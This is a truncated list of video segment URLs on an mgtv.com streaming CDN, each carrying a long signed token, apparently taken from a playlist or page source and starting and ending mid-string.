DOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D5AFD85E64726A53DB719B8F65436F56_190080_200080_449_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BBCF999507E6969212B2273A1ED359B8_200080_210080_767_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3DB8FA9A210D4E622AFC0576C5248CCF_210080_220080_1842_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/9912ACE4C1A079D29C4BAADCC66C3360_220080_230080_1872_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D349749B62AC7CC7CD15D2CAC5BC328_230080_240080_866_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BCCBCF357A161C0FFB1077EF151ACD80_240080_250080_1876_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CCAE03BE2E7DC3107B000D5FA87D3241_250080_260079_666_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/398CECCEEB051A7E6515FF0ACB6CD36E_260079_270080_1244_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D1C108D6F9ED7F95FE6CFDED732B380_270080_280080_1437_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/11FFEEF34FA954EE2F9A984006A390D9_280080_290080_1994_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6438BED6D771EAC0CDF54B9E891460EF_290080_300080_583_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/51C8822A761F00104AFD198F71265623_300080_310080_425_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6531649F40255F4C6A1FDD005920E297_310080_320080_1030_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2429C24A14E10CF1C8BE1257628D7382_320080_330080_965_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0468DFF9BE24361388E3CB14A4C31BE2_330080_340080_994_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E45C59558833E06896D6D9AE0EF7BA15_340080_350080_715_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C8E7A56078AE6BECBA1B5A3AA680441A_350080_360080_627_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/83CD51118435ADE2034022A99F35DD41_360080_370080_795_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/EA1EC0881634FB754217EF0044C3ACD2_370080_380080_1053_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E7A2298D167DEFC0756544B2CE049449_380080_390080_1402_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4AE3988A48F84870551B7E9E0B972D0C_390080_400080_1203_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKa